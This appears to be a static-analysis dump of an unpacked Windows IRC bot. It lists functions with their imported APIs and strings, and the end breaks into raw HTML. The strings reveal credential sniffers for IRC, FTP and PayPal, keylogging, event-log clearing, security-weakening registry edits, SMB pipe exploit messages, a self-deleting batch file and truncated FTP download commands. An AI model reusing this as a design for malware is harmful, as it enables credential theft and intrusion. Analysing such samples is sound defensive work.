sub_outside():
	KERNEL32.Sleep
	KERNEL32.GetTickCount
	KERNEL32.SetErrorMode
	KERNEL32.ExitProcess
	WS2_32.WSAStartup
	WS2_32.WSACleanup
	KERNEL32.CreateThread
	NTDLL.RtlGetLastWin32Error
	WS2_32.getsockname
	WS2_32.inet_ntoa
	DNSAPI.DnsFlushResolverCache
	WS2_32.closesocket
	WS2_32.inet_addr
	WS2_32.gethostbyname
	WS2_32.socket
	WS2_32.htons
	WS2_32.connect
	WS2_32.recv
	WS2_32.send
	WS2_32.gethostbyaddr
	KERNEL32.GetLocaleInfoA
	KERNEL32.GetVersionExA
	NTDLL.RtlDeleteCriticalSection
	KERNEL32.InitializeCriticalSectionAndSpinCount
	KERNEL32.ReadFile
	KERNEL32.CreateFileA
	KERNEL32.SetFilePointer
	WS2_32.WSAGetLastError
	KERNEL32.CloseHandle
	WS2_32.select
	WS2_32.getpeername
	KERNEL32.TerminateThread
	KERNEL32.GetCurrentProcess
	WS2_32.bind
	WS2_32.listen
	WS2_32.accept
	WS2_32.__WSAFDIsSet
	USER32.GetForegroundWindow
	USER32.GetWindowTextA
	USER32.GetKeyState
	USER32.GetAsyncKeyState
	WS2_32.gethostname
	WS2_32.WSAIoctl
	WS2_32.WSASocketA
	WS2_32.setsockopt
	WS2_32.htonl
	WS2_32.sendto
	GDI32.CreateDCA
	GDI32.GetDeviceCaps
	GDI32.CreateCompatibleDC
	GDI32.CreateDIBSection
	GDI32.SelectObject
	GDI32.BitBlt
	GDI32.GetDIBColorTable
	GDI32.DeleteObject
	GDI32.DeleteDC
	WININET.InternetOpenUrlA
	WININET.InternetCloseHandle
	USER32.FindWindowA
	KERNEL32.SearchPathA
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcessHeap
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Process32First
	KERNEL32.Process32Next
	KERNEL32.lstrcmpi
	KERNEL32.OpenProcess
	KERNEL32.Module32First
	KERNEL32.CreatePipe
	KERNEL32.GetVersion
	KERNEL32.LCMapStringW
	KERNEL32.WideCharToMultiByte
	KERNEL32.GetStringTypeW
	KERNEL32.MultiByteToWideChar
sub_4249B3(0126):
	KERNEL32.SetUnhandledExceptionFilter
sub_416AA3(019e):
	"%sKB"
	"failed"
sub_41263A(078a):
	"FTP	sniff"
	"#Bo"
	"NICK	"
	"220 "
	"230 "
	"USER	"
	"PASS	"
sub_41DFF2(0a41):
	KERNEL32.HeapCreate
	KERNEL32.HeapDestroy
sub_4125C4(0d1f):
	"IRC	sniff"
	"#Bo"
	"OPER	"
	"NICK	"
	"oper	"
	"You are now an IRC Operator"
sub_40C5B7(0d6f):
	WS2_32.inet_ntoa
	KERNEL32.CreateThread
	KERNEL32.Sleep
	KERNEL32.CloseHandle
sub_4250D1(0e35):
	KERNEL32.LoadLibraryA

	"user32.dll"
	"MessageBoxA"
	"GetActiveWindow"
	"GetLastActivePopup"
sub_401875(0f5b):
	WS2_32.htons
	WS2_32.socket
	WS2_32.connect
	WS2_32.closesocket
	KERNEL32.Sleep
sub_40FA29(0fa0):
	KERNEL32.GetFileAttributesA
	WS2_32.closesocket
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle
	KERNEL32.CreateThread
	NTDLL.RtlGetLastWin32Error
	KERNEL32.Sleep

	"\\%s"
	"%s"
	"\n"
	"*"
sub_418B56(136f):
	ADVAPI32.OpenSCManagerA
	ADVAPI32.EnumServicesStatusA
	NTDLL.RtlGetLastWin32Error
	ADVAPI32.CloseServiceHandle

	"The following	Windows	services are regi"...
	"	 Unknown"
	"	 Paused"
	"    Pausing"
	" Continuing"
	"    Running"
	"    Stoping"
	"   Starting"
	"    Stopped"
	"%s: %s (%s)"
sub_423287(18d1):
	"C:\\m_unpacker\\packed.exe"
sub_426153(199d):
	KERNEL32.CompareStringW
	KERNEL32.CompareStringA
	KERNEL32.MultiByteToWideChar
sub_4158F2(1c79):
	USER32.IsWindow
	USER32.SendMessageA
	USER32.DestroyWindow

	"Window"
start(21e8):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegDeleteValueA
	ADVAPI32.RegCloseKey

	"Windows AntiVirus oo"
sub_40BE55(22a3):
	"%d.%d.%d.%d"
sub_422828(22de):
	NTDLL.RtlSizeHeap
sub_417F6F(24da):
	WS2_32.inet_addr
	WS2_32.socket
	WS2_32.htons
	WS2_32.connect
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket
sub_41A6BE(28ac):
	WS2_32.htons
	WS2_32.socket
	WS2_32.connect
	KERNEL32.GetTickCount
	WS2_32.send
	WS2_32.closesocket

	"POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
	"\r\n"
sub_40B8B2(28ed):
	WS2_32.inet_ntoa
sub_4175A9(2950):
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	NTDLL.RtlFreeHeap
sub_41123B(2ae6):
	WS2_32.send
	WS2_32.recv
sub_4194C0(2bcd):
	"Username accounts for	local system:"
	"  %S"
	"Total	users found: %d."
sub_40AA20(2cf7):
	IPHLPAPI.GetIpNetTable
	IPHLPAPI.DeleteIpNetEntry
sub_422FF2(2f2e):
	KERNEL32.UnhandledExceptionFilter
sub_411D74(3823):
	KERNEL32.GetLocalTime

	"\\"
	"winnt99.bat"
	"ab"
	"[%d-%d-%d %d:%d:%d] %s\r\n"
sub_40BE0D(3b1d):
	WS2_32.htonl
sub_41BFCC(3d17):
	NTDLL.RtlGetLastWin32Error
sub_4186C5(3f0f):
	KERNEL32.GetVersionExA
	ADVAPI32.OpenEventLogA
	ADVAPI32.ClearEventLogA
	NTDLL.RtlGetLastWin32Error
sub_40F360(4036):
	WS2_32.WSAStartup
	WS2_32.socket
	WS2_32.inet_addr
	WS2_32.htons
	WS2_32.connect
	WS2_32.closesocket
	WS2_32.WSACleanup
sub_41A89B(4107):
	"www.schlund.net"
	"www.utwente.nl"
	"verio.fr"
	"www.1und1.de"
	"www.switch.ch"
	"www.belwue.de"
	"de.yahoo.com"
	"www.google.it"
	"www.xo.net"
	"www.stanford.edu"
	"www.verio.com"
	"www.nocster.com"
	"www.rit.edu"
	"www.cogentco.com"
	"www.burst.net"
	"nitro.ucsc.edu"
	"www.level3.com"
	"www.above.net"
	"www.easynews.com"
	"www.google.com"
	"www.lib.nthu.edu.tw"
	"www.st.lib.keio.ac.jp"
	"www.d1asia.com"
	"www.nifty.com"
	"yahoo.co.jp"
	"www.google.co.jp"
sub_40E2E5(4c1f):
	WS2_32.inet_addr
	WS2_32.htons
	WS2_32.socket
	WS2_32.connect
	WS2_32.recv
	WS2_32.send
	WS2_32.closesocket

	"ibmcvevvpwy.exe"
	"cmd /c echo open %s %d >> ii &echo user"...
sub_40B63A(4c22):
	" Scan Time: %s."
sub_419828(4dbc):
	ADVAPI32.LookupPrivilegeValueA
	ADVAPI32.AdjustTokenPrivileges
	KERNEL32.CloseHandle
sub_40E69E(4e3f):
	WS2_32.inet_addr
	WS2_32.htons
	WS2_32.socket
	WS2_32.connect
	WS2_32.recv
	WS2_32.send
	WS2_32.closesocket

	"ibmcvevvpwy.exe"
	"cmd /k echo open %s %d >> ii &echo user"...
sub_41AF92(4f24):
	WININET.InternetCrackUrlA
	WININET.InternetConnectA
	WININET.HttpOpenRequestA
	WININET.HttpSendRequestA
	WININET.InternetCloseHandle
sub_421BF9(502f):
	"e+000"
sub_40BF8E(5047):
	KERNEL32.GetTickCount
	WS2_32.inet_ntoa
	NTDLL.RtlEnterCriticalSection
	NTDLL.RtlLeaveCriticalSection
	KERNEL32.Sleep

	"sym"
sub_410FCB(5689):
	KERNEL32.CreatePipe
	NTDLL.RtlGetLastWin32Error
	KERNEL32.CloseHandle
sub_41AB62(5868):
	KERNEL32.Sleep
sub_41EE8E(58ed):
	KERNEL32.VirtualAlloc
sub_416A5B(5b85):
	KERNEL32.GetDiskFreeSpaceExA
sub_40D066(5f99):
	WS2_32.send

	"GET /	HTTP/1.0\r\nHost: %s\r\nAuthorization"...
sub_41B3F2(6050):
	NTDLL.RtlAllocateHeap
	NTDLL.RtlReAllocateHeap
sub_422A04(6091):
	KERNEL32.SetFilePointer
	NTDLL.RtlGetLastWin32Error
sub_425912(6338):
	"1#SNAN"
	"1#IND"
	"1#INF"
	"1#QNAN"
sub_4189D8(6353):
	"The specified	service	name is	invalid."
	"The requested	control	code is	undefined"...
	"The handle is	invalid."
	"The handle does not have the required	a"...
	"The service binary file could	not be fo"...
	"The service cannot be	stopped	because	o"...
	"The database is locked."
	"A thread could not be	created	for the	s"...
	"The process for the service was started"...
	"The requested	control	code is	not valid"...
	"An instance of the service is	already	r"...
	"The system is	shutting down."
	"An unknown error occurred: <%ld>"
sub_41E7A5(64eb):
	KERNEL32.VirtualAlloc
sub_40ED60(66d7):
	WS2_32.WSAStartup
	WS2_32.socket
	WS2_32.setsockopt
	WS2_32.ioctlsocket
	WS2_32.htons
	WS2_32.bind
	WS2_32.listen
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.accept
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket

	"220 StnyFtpd 0wns j0\n"
	"%s %s"
	"USER"
	"331 Password required\n"
	"PASS"
	"230 User logged in.\n"
	"SYST"
	"215 StnyFtpd\n"
	"REST"
	"350 Restarting.\n"
	"257 \"/\" is current directory.\n"
	"TYPE"
	"A"
	"200 Type set to A.\n"
	"TYPE"
	"I"
	"200 Type set to I.\n"
	"PASV"
	"425 Passive not supported on this serve"...
	"LIST"
	"226 Transfer complete\n"
	"PORT"
	"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
	"%x%x\n"
	"%s.%s.%s.%s"
	"200 PORT command successful.\n"
	"RETR"
	"150 Opening BINARY mode data connection"...
	"226 Transfer complete.\n"
	"[FTP]: I just	owned: %s"
	"425 Can't open data connection.\n"
	"QUIT"
	"221 Goodbye happy r00ting.\n"
sub_4240A6(66df):
	KERNEL32.WideCharToMultiByte
sub_41714F(6944):
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	NTDLL.RtlFreeHeap

	"WINLOGON"
	"NWGINA"
	"MSGINA"
sub_415B31(69df):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

	"r"
	"="
	"="
sub_4238CD(69e9):
	""
	"..."
	"Runtime Error!\n\nProgram: "
	"\n\n"
	"Microsoft Visual C++ Runtime Library"
sub_423BE3(6be0):
	NTDLL.RtlGetLastWin32Error
sub_40E78C(6bfa):
	WS2_32.inet_addr
	WS2_32.htons
	WS2_32.socket
	WS2_32.connect
	WS2_32.send
	WS2_32.closesocket
sub_415EA1(6c15):
	WS2_32.socket
	WS2_32.htons
	WS2_32.bind
	WS2_32.getsockname
	WS2_32.listen
	KERNEL32.CreateFileA
	WS2_32.inet_addr
	WS2_32.htonl
	WS2_32.select
	WS2_32.accept
	WS2_32.closesocket
	KERNEL32.SetFilePointer
	KERNEL32.ReadFile
	WS2_32.send
	WS2_32.recv
	KERNEL32.CloseHandle
	WS2_32.inet_ntoa
sub_41B2A1(6c37):
	NTDLL.RtlFreeHeap
sub_40F477(6cf2):
	WS2_32.htons
	WS2_32.socket
	WS2_32.bind
	WS2_32.listen
	WS2_32.ioctlsocket
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.accept
	WS2_32.recv
	WS2_32.closesocket
	WS2_32.WSAGetLastError

	"GET "
	" "
	"\r\n"
sub_417B38(7166):
	"-|`_\\{[]}"
	"-|`_\\{[]}"
	"-|`_\\{[]}"
	"-|`_\\{[]}"
sub_416F7D(740a):
	KERNEL32.LoadLibraryA
	KERNEL32.GetEnvironmentVariableW

	"SeDebugPrivilege"
	"NTDLL.DLL"
	"NtQuerySystemInformation"
	"RtlCreateQueryDebugBuffer"
	"RtlQueryProcessDebugInformation"
	"RtlDestroyQueryDebugBuffer"
	"RtlRunDecodeUnicodeString"
	"USERNAME"
	"USERDOMAIN"
	"SeDebugPrivilege"
sub_41B703(7566):
	NTDLL.RtlAllocateHeap
sub_414C60(772a):
	WS2_32.connect
	WS2_32.ioctlsocket
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.getsockopt
sub_419BEB(7918):
	KERNEL32.CloseHandle
sub_4124AD(79f8):
	"Bot	sniff"
	"#Bo"
	"[PSNIFF]:"
	"PSNIFF//"
	"JOIN	#"
	"302 "
	"366 "
	":.login"
	":!login"
	":!Login"
	":.Login"
	":.ident"
	":!ident"
	":.hashin"
	":!hashin"
sub_4137F8(79fd):
	WS2_32.htons
	WS2_32.socket
	WS2_32.ioctlsocket
	WS2_32.connect
	KERNEL32.Sleep
	WS2_32.closesocket
sub_4234D4(7fa9):
	KERNEL32.GetEnvironmentStringsW
	KERNEL32.GetEnvironmentStrings
	KERNEL32.WideCharToMultiByte
	KERNEL32.FreeEnvironmentStringsW
sub_4268EC(822d):
	"invalid string position"
sub_4266C0(822d):
	"string too long"
sub_426C4A(83a2):
	KERNEL32.LCMapStringW
	KERNEL32.WideCharToMultiByte
	KERNEL32.MultiByteToWideChar
sub_417759(8474):
	WS2_32.socket
	WS2_32.htons
	WS2_32.inet_addr
	WS2_32.gethostbyname
	WS2_32.connect
	WS2_32.closesocket
sub_41DC92(84ec):
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error
sub_41E04F(8555):
	NTDLL.RtlAllocateHeap
sub_40B1F9(8732):
	"%s %s	stopped. (%d thread(s) stopped.)"
	"%s No	%s thread found."
sub_40BEF1(8768):
	WS2_32.socket
	WS2_32.htons
	WS2_32.ioctlsocket
	WS2_32.connect
	WS2_32.select
	WS2_32.closesocket
sub_41E0C2(87ad):
	KERNEL32.VirtualFree
	NTDLL.RtlFreeHeap
sub_4190F2(893c):
	"Account: %S"
	"Full Name:	%S"
	"User Comment: %S"
	"Comment: %S"
	"Unknown"
	"Administrator"
	"User"
	"Guest"
	"Privilege Level: %s"
	"Auth Flags: %d"
	"Home Directory: %S"
	"Parameters: %S"
	"Password Age: %d"
	"Bad Password Count: %d"
	"Number of Logins: %d"
	"Last Logon: %d"
	"Last Logoff: %d"
	"Logon Server: %S"
	"Country	Code: %d"
	"User's Language: %d"
	"Max. Storage: %d"
sub_40FCD8(8a1e):
	WS2_32.send
	KERNEL32.FindFirstFileA
	KERNEL32.FindNextFileA
	KERNEL32.Sleep

	"\n"
	"PRIVMSG %s :Searching	for: %s\r\n"
	"\r\n\r\nIndex of %s</TIT"...
	"<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
	"<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
	".."
	"."
	"PM"
	"AM"
	"%2.2d/%2.2d/%4d  %2.2d:%2.2d %s"
	"<%s>"
	"PRIVMSG %s :%-31s  %-21s\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"%s%s/"
	"\"><CODE>%.29s>/</CODE></A>"
	"\"><CODE>%s/</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"<%s>"
	"%-31s  %-21s\r\n"
	"PRIVMSG %s :%-31s  %-21s (%s bytes)\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"\"><CODE>%.30s></CODE></A>"
	"\"><CODE>%s</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"%-31s  %-21s (%i bytes)\r\n"
	"PRIVMSG %s :Found %s Files and %s Direc"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"Found: %i Files and %i Directories\r\n"
sub_41CD64(8af0):
	NTDLL.RtlUnwind
sub_418D55(8cdb):
	KERNEL32.WideCharToMultiByte
sub_4172D8(8d16):
	KERNEL32.GetSystemInfo
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	KERNEL32.ReadProcessMemory
	KERNEL32.VirtualQueryEx
	NTDLL.RtlFreeHeap
	KERNEL32.CloseHandle
sub_4183BA(8e50):
	USER32.OpenClipboard
	USER32.GetClipboardData
	KERNEL32.GlobalLock
	KERNEL32.GlobalUnlock
	USER32.CloseClipboard
sub_409966(8eab):
	WS2_32.send
	KERNEL32.Sleep

	"NOTICE"
	"PRIVMSG"
	"%s"
	"%s %s :%s\r\n"
sub_426ED5(9045):
	KERNEL32.GetStringTypeW
	KERNEL32.WideCharToMultiByte
sub_41D5DE(91cb):
	KERNEL32.GetFileAttributesA
	NTDLL.RtlGetLastWin32Error
sub_418E8B(935d):
	ADVAPI32.IsValidSecurityDescriptor

	"Share	name:	 Resource:		 "...
	"Yes"
	"No"
	"%-14S %-24S %-6u %-4s"
sub_40C930(94d6):
	"BBBB"
	"CCCC"
sub_41DA54(95ea):
	KERNEL32.MultiByteToWideChar
	NTDLL.RtlGetLastWin32Error
sub_41A6A4(963b):
	KERNEL32.GetTickCount
sub_40CD05(981b):
	WS2_32.htonl
	WS2_32.send
sub_42410E(9a80):
	KERNEL32.MultiByteToWideChar
sub_41D271(9ac8):
	KERNEL32.GetLocalTime
sub_419636(9bb4):
	"Invalid parameter."
	"Server name not found."
	"This network request is not supported."
	"Not enough memory."
	"The name is invalid."
	"Duplicate share name."
	"Invalid for redirected resource."
	"Device or directory does not exist."
	"Level	parameter is invalid."
	"A general failure occurred in	the netwo"...
	"The operation	is allowed only	on the pr"...
	"The user account already exists."
	"The group already exists."
	"The password is shorter than required	("...
	"An unknown error occurred."
	"The computer name is invalid."
	"Share	not found."
	"The user name	could not be found."
	"Network connection not found."
sub_41851B(9dbe):
	USER32.ExitWindowsEx

	"SeShutdownPrivilege"
sub_40CE29(a2f7):
	WS2_32.send
sub_417826(a46d):
	WS2_32.send

	" "
	"PING"
	"433"
sub_401132(a474):
	WS2_32.closesocket
	WS2_32.WSACleanup
	KERNEL32.Sleep
	KERNEL32.CloseHandle
	KERNEL32.ExitProcess
sub_40B0AC(a84d):
	WS2_32.closesocket
sub_423C7E(a946):
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error
sub_418936(a9bc):
	ADVAPI32.OpenSCManagerA
	NTDLL.RtlGetLastWin32Error
	ADVAPI32.OpenServiceA
	ADVAPI32.ControlService
	ADVAPI32.StartServiceA
	ADVAPI32.DeleteService
	ADVAPI32.CloseServiceHandle
sub_409A01(aaa2):
	KERNEL32.GetModuleHandleA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.LoadLibraryA
	WININET.InternetOpenA

	"kernel32.dll"
	"SetErrorMode"
	"CreateToolhelp32Snapshot"
	"Process32First"
	"GetDiskFreeSpaceExA"
	"GetLogicalDriveStringsA"
	"SearchPathA"
	"QueryPerformanceCounter"
	"QueryPerformanceFrequency"
	"RegisterServiceProcess"
	"user32.dll"
	"SendMessageA"
	"FindWindowA"
	"IsWindow"
	"GetClipboardData"
	"CloseClipboard"
	"GetAsyncKeyState"
	"GetKeyState"
	"GetWindowTextA"
	"GetForegroundWindow"
	"advapi32.dll"
	"RegCreateKeyExA"
	"RegSetValueExA"
	"RegQueryValueExA"
	"RegDeleteValueA"
	"RegCloseKey"
	"ClearEventLogA"
	"OpenProcessToken"
	"LookupPrivilegeValueA"
	"AdjustTokenPrivileges"
	"OpenSCManagerA"
	"OpenServiceA"
	"ControlService"
	"CloseServiceHandle"
	"EnumServicesStatusA"
	"IsValidSecurityDescriptor"
	"GetUserNameA"
	"gdi32.dll"
	"CreateDCA"
	"CreateDIBSection"
	"CreateCompatibleDC"
	"GetDIBColorTable"
	"SelectObject"
	"BitBlt"
	"DeleteDC"
	"DeleteObject"
	"ws2_32.dll"
	"WSAStartup"
	"WSASocketA"
	"WSAAsyncSelect"
	"__WSAFDIsSet"
	"WSAIoctl"
	"WSAGetLastError"
	"WSACleanup"
	"socket"
	"ioctlsocket"
	"connect"
	"inet_ntoa"
	"inet_addr"
	"htons"
	"htonl"
	"ntohs"
	"ntohl"
	"send"
	"sendto"
	"recv"
	"recvfrom"
	"bind"
	"select"
	"listen"
	"accept"
	"setsockopt"
	"getsockname"
	"gethostname"
	"getpeername"
	"closesocket"
	"wininet.dll"
	"InternetGetConnectedState"
	"InternetGetConnectedStateEx"
	"HttpOpenRequestA"
	"HttpSendRequestA"
	"InternetConnectA"
	"InternetOpenUrlA"
	"InternetCrackUrlA"
	"InternetReadFile"
	"InternetCloseHandle"
	"Mozilla/4.0 (compatible)"
	"icmp.dll"
	"IcmpCreateFile"
	"IcmpCloseHandle"
	"IcmpSendEcho"
	"netapi32.dll"
	"NetShareAdd"
	"NetShareDel"
	"NetShareEnum"
	"NetScheduleJobAdd"
	"NetApiBufferFree"
	"NetRemoteTOD"
	"NetUserAdd"
	"NetUserDel"
	"NetUserEnum"
	"NetUserGetInfo"
	"NetMessageBufferSend"
	"NetWkstaGetInfo"
	"dnsapi.dll"
	"DnsFlushResolverCache"
	"DnsFlushResolverCacheEntry_A"
	"iphlpapi.dll"
	"DeleteIpNetEntry"
	"mpr.dll"
	"WNetAddConnection2A"
	"WNetAddConnection2W"
	"WNetCancelConnection2A"
	"WNetCancelConnection2W"
	"shell32.dll"
	"SHChangeNotify"
	"odbc32.dll"
	"SQLDriverConnect"
	"SQLAllocHandle"
	"avicap32.dll"
	"capCreateCaptureWindowA"
	"capGetDriverDescriptionA"
sub_40A6BD(ac3c):
	"Kernel32.dll failed. <%d>"
	"User32.dll failed. <%d>"
	"Advapi32.dll failed. <%d>"
	"Gdi32.dll failed. <%d>"
	"Ws2_32.dll failed. <%d>"
	"Wininet.dll failed. <%d>"
	"Icmp.dll failed. <%d>"
	"Netapi32.dll failed. <%d>"
	"Dnsapi.dll failed. <%d>"
	"Iphlpapi.dll failed. <%d>"
	"Mpr32.dll failed. <%d>"
	"Shell32.dll failed. <%d>"
	"Odbc32.dll failed. <%d>"
	"Avicap32.dll failed. <%d>"
sub_426B9B(aeff):
	KERNEL32.RaiseException
sub_41DC6E(af5c):
	KERNEL32.ExitProcess
sub_418E27(afa1):
	KERNEL32.MultiByteToWideChar
sub_413991(afc0):
	WS2_32.WSAStartup
	WS2_32.WSASocketA
	WS2_32.setsockopt
	WS2_32.htons
	WS2_32.htonl
	WS2_32.sendto
	WS2_32.closesocket
	WS2_32.WSACleanup
	WS2_32.WSAGetLastError
sub_416A12(b2db):
	KERNEL32.GetDriveTypeA

	"Cdrom"
	"Network"
	"Disk"
	"Invalid"
	"Unknown"
sub_40C4C6(b7e3):
	WS2_32.inet_ntoa
	KERNEL32.CreateThread
	KERNEL32.Sleep
	KERNEL32.CloseHandle
	WS2_32.htonl
sub_424A3C(b95a):
	KERNEL32.WideCharToMultiByte

	"TZ"
sub_4126C1(b9cf):
	"HTTP sniff"
	"#Bo"
	"paypal"
	"PAYPAL"
	"PAYPAL.COM"
	"paypal.com"
	"Set-Cookie:"
sub_4019DB(be9b):
	WS2_32.send
	WS2_32.closesocket
	KERNEL32.Sleep
	WS2_32.recv

	"PASS	%s\r\n"
sub_40AEA6(c0f8):
	KERNEL32.GetTickCount

	"[%d]"
sub_40B4AD(c3fd):
	" Total: %d in %s."
sub_41F33C(c6bf):
	KERNEL32.ReadFile
	NTDLL.RtlGetLastWin32Error
sub_41119D(c6f1):
	WS2_32.send
	KERNEL32.ReadFile
	NTDLL.RtlGetLastWin32Error
sub_409920(c85a):
	WS2_32.send
sub_41747C(c8f8):
	KERNEL32.GetSystemInfo
	KERNEL32.VirtualQueryEx
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	NTDLL.RtlFreeHeap
	KERNEL32.CloseHandle
sub_41AACB(c9d9):
	KERNEL32.GetVersionExA
sub_40ABA1(cb72):
	KERNEL32.GetTickCount

	"%s"
sub_41CAC0(cba9):
	NTDLL.RtlUnwind
sub_41E6F4(cbe8):
	NTDLL.RtlReAllocateHeap
	NTDLL.RtlAllocateHeap
	KERNEL32.VirtualAlloc
	NTDLL.RtlFreeHeap
sub_40E3D2(cca7):
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle
	KERNEL32.Sleep

	"\\\\%s\\ipc$"
	"[-] Failed to	connect	to host	!\n"
	"\\\\%s\\pipe\\browser"
	"[+] Binding to RPC interface ... \n"
sub_410565(cdee):
	WS2_32.htons
	WS2_32.socket
	WS2_32.WSAAsyncSelect
	WS2_32.bind
	WS2_32.listen
	WS2_32.accept
	WS2_32.inet_ntoa
	KERNEL32.CreateThread
	NTDLL.RtlGetLastWin32Error
	KERNEL32.Sleep
	WS2_32.closesocket
sub_418330(cfaf):
	NTDLL.RtlGetLastWin32Error

	"%s	Error: %s <%d>."
sub_412748(cfb4):
	"VULN sniff"
	"#Bo"
	"OpenSSL/0.9.6"
	"Serv-U FTP Server"
	"OpenSSH_2"
sub_40A9E8(cfca):
	WS2_32.inet_addr
	WS2_32.gethostbyname
sub_41A36A(d194):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey
	KERNEL32.GetDriveTypeA

	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
	"%c$"
	"%c:\\"
sub_4212CC(d2f6):
	KERNEL32.RaiseException
sub_40CC86(d5f8):
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.recv
sub_41A044(d7a4):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey

	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
sub_4249A2(d8fa):
	KERNEL32.SetUnhandledExceptionFilter
sub_4177DF(d935):
	WS2_32.send

	"\n"
sub_41EB96(df93):
	NTDLL.RtlAllocateHeap
	KERNEL32.VirtualAlloc
	KERNEL32.VirtualFree
	NTDLL.RtlFreeHeap
sub_40AAF8(e076):
	WS2_32.getsockname

	"%d.%d.%d.%d"
sub_421AD2(e0a4):
	"KERNEL32"
	"IsProcessorFeaturePresent"
sub_416C90(e0b0):
	KERNEL32.GetLogicalDriveStringsA

	"A:\\"
sub_410444(e1a1):
	WS2_32.WSAStartup
	WS2_32.socket
	WS2_32.htons
	WS2_32.connect
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket
	WS2_32.WSACleanup

	"%s %s	HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
</font></pre></td></tr><tr id="sub_41853D"><td><pre><a name="sub_41853D"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41853D"><font size=+2>sub_41853D</a>(e208)</font>:<font color=darkgreen>
	KERNEL32.CreateFileA
	KERNEL32.GetFileAttributesA</font>
<font color=brown>
	"%sdel.bat"
	"@echo	off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
	"%%comspec%% /c %s	%s"
</font></pre></td></tr><tr id="sub_40D83A"><td><pre><a name="sub_40D83A"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40D83A"><font size=+2>sub_40D83A</a>(e39f)</font>:<font color=darkgreen>
	KERNEL32.CreateFileA
	KERNEL32.ReadFile
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown>
	"."
	"\\\\%s\\ipc$"
	"\\\\%s\\pipe\\browser"
</font></pre></td></tr><tr id="sub_4156F9"><td><pre><a name="sub_4156F9"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4156F9"><font size=+2>sub_4156F9</a>(e468)</font>:<font color=darkgreen>
	USER32.IsWindow
	USER32.SendMessageA
	USER32.DestroyWindow</font>
<font color=brown>
	"Window"
</font></pre></td></tr><tr id="sub_41AC18"><td><pre><a name="sub_41AC18"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41AC18"><font size=+2>sub_41AC18</a>(e474)</font>:<font color=darkgreen>
	KERNEL32.GetVersionExA
	ADVAPI32.GetUserNameA
	WS2_32.inet_addr
	WS2_32.gethostbyaddr</font>
<font color=brown>
	"95"
	"NT"
	"98"
	"ME"
	"2K"
	"XP"
	"2003"
	"???"
	"%s (%s)"
	"couldn't resolve host"
	"HH:mm:ss"
</font></pre></td></tr><tr id="sub_41AA78"><td><pre><a name="sub_41AA78"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41AA78"><font size=+2>sub_41AA78</a>(e5dd)</font>:<font color=darkgreen>
	KERNEL32.GetTickCount</font>
<font color=brown>
	"%dd %dh %dm"
</font></pre></td></tr><tr id="sub_41ECDA"><td><pre><a name="sub_41ECDA"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41ECDA"><font size=+2>sub_41ECDA</a>(ea79)</font>:<font color=darkgreen>
	KERNEL32.VirtualFree
	NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_418872"><td><pre><a name="sub_418872"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_418872"><font size=+2>sub_418872</a>(ec5e)</font>:<font color=darkgreen>
	KERNEL32.GetTickCount</font>
<font color=brown></font></pre></td></tr><tr id="sub_40F3DD"><td><pre><a name="sub_40F3DD"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40F3DD"><font size=+2>sub_40F3DD</a>(ed56)</font>:<font color=darkgreen>
	WS2_32.send
	KERNEL32.Sleep
	WS2_32.closesocket
	WS2_32.WSACleanup</font>
